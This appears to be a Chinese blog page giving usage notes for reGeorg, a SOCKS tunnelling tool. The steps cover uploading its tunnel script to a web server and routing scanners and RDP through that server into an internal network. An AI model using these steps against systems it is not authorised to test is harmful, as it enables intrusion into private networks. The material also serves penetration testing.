reGeorg v1.0 git

Usage

$ reGeorgSocksProxy.py [-h] [-l] [-p] [-r] -u  [-v]

Socks server for reGeorg HTTP(s) tunneller

optional arguments:
-h, --help show this help message and exit
-l , --listen-on The default listening address
-p , --listen-port The default listening port
-r , --read-buff Local read buffer, max data to be sent per POST
-u , --url The url containing the tunnel script
-v , --verbose Verbose output[INFO|DEBUG]
  • Step 1. Upload tunnel.(aspx|ashx|jsp|php) to a webserver (How you do that is up to you)

  • Step 2. Configure you tools to use a socks proxy, use the ip address and port you specified when you started the reGeorgSocksProxy.py

** Note, if you tools, such as NMap doesn't support socks proxies, use proxychains

  • Step 3. Hack the planet :)

Example

$ python reGeorgSocksProxy.py -p 8080 -u http://upload.sensepost.net:8080/tunnel/tunnel.jsp

1、在Web服务器上上传并运行脚本

http://172.16.7.20:8080/tunnel.tomcat.5.jsp

2、reGeorgSocksProxy.py转发流量

3、本地Proxifier建立12.0.0.1:8888的 socket5代理(会话层)

mstsc 192.168.1.201(内网)即可

最新文章

  1. ASP.NET MVC5+EF6+EasyUI 后台管理系统(64)-WebApi与Unity注入
  2. 获取 dhcp IP 过程分析 - 每天5分钟玩转 OpenStack(91)
  3. ABP集合贴
  4. 使用selenium编写脚本常见问题(一)
  5. Oracle查询某段日期内某个时间段的数据
  6. Asp.net MVC4 与 Web Form 并存
  7. 在UltraEdit的查找和替换中使用正则表达式 (转)
  8. 【高可用HA】Apache (1) —— Mac下安装Apache Httpd到自定义路径(非/etc/apache2)
  9. JS初学的一些易错的知识点
  10. 【Android Api 翻译4】android api 完整翻译之Contacts Provider (学习安卓必知的api,中英文对照)
  11. poj 2115 C Looooops(扩展gcd)
  12. C#中的事件-订阅与发布
  13. Asp.net Mvc HTTP 404。
  14. LabVIEW的错误簇以及错误处理函数
  15. Java学习的随笔(一)对象概念、this指针、权限修饰符
  16. 使用form的target属性屏蔽url跳
  17. JSONP、图片Ping、XMLHttpRequest2.0等跨域资源请求(CORS)
  18. 记一次禁止chrome打印出现空白页的情况
  19. php常用的魔术方法
  20. SpringBoot实战(十)之使用Spring Boot Actuator构建RESTful Web服务

热门文章

  1. 适配ios10(iTunes找不到构建版本)
  2. c#中抽象类(abstract)和接口(interface)的相同点与区别
  3. Ubuntu1404安装gogs过程
  4. vagrant vbox上配置好开发环境缓存问题
  5. 使用 Fiddler 上传微信公众账号 自定义菜单
  6. 通过Ajax使用FormData对象无刷新上传文件
  7. 查看Linux版本信息
  8. Linux备份ifcfg-eth0文件导致的网络故障问题
  9. static
  10. WPF 自定义CheckBox